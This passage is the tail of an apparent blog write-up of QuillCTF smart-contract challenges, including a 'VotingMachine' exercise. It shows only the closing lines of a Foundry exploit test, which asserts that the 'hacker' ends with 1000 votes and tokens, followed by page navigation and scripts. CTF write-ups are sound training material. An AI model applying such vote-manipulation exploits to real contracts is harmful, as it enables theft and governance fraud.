console.log(&quot;Hacker&#x27;s vToken after the attack: %s: &quot;, hacker_balance);</span><br><span class="line"></span><br><span class="line">        assertEq(hacker_vote, 1000);</span><br><span class="line">        assertEq(hacker_balance, 1000);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#19-Predictable-nft"><span class="toc-number">1.</span> <span class="toc-text">19-Predictable-nft</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Objective"><span class="toc-number">1.1.</span> <span class="toc-text">Objective</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Code"><span class="toc-number">1.2.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Observation"><span class="toc-number">1.3.</span> <span class="toc-text">Observation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Attack"><span class="toc-number">1.4.</span> <span class="toc-text">Attack</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#20-VotingMachine"><span class="toc-number">2.</span> <span class="toc-text">20-VotingMachine</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Objective-1"><span class="toc-number">2.1.</span> <span class="toc-text">Objective</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Code-1"><span class="toc-number">2.2.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Observation-1"><span class="toc-number">2.3.</span> <span class="toc-text">Observation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Attack-1"><span class="toc-number">2.4.</span> <span class="toc-text">Attack</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&text=QuillCTF-Last 14 Challenges"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&is_video=false&description=QuillCTF-Last 14 Challenges"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=QuillCTF-Last 14 Challenges&body=Check out this article: http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&name=QuillCTF-Last 14 Challenges&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&t=QuillCTF-Last 14 Challenges"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    KKontheway
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
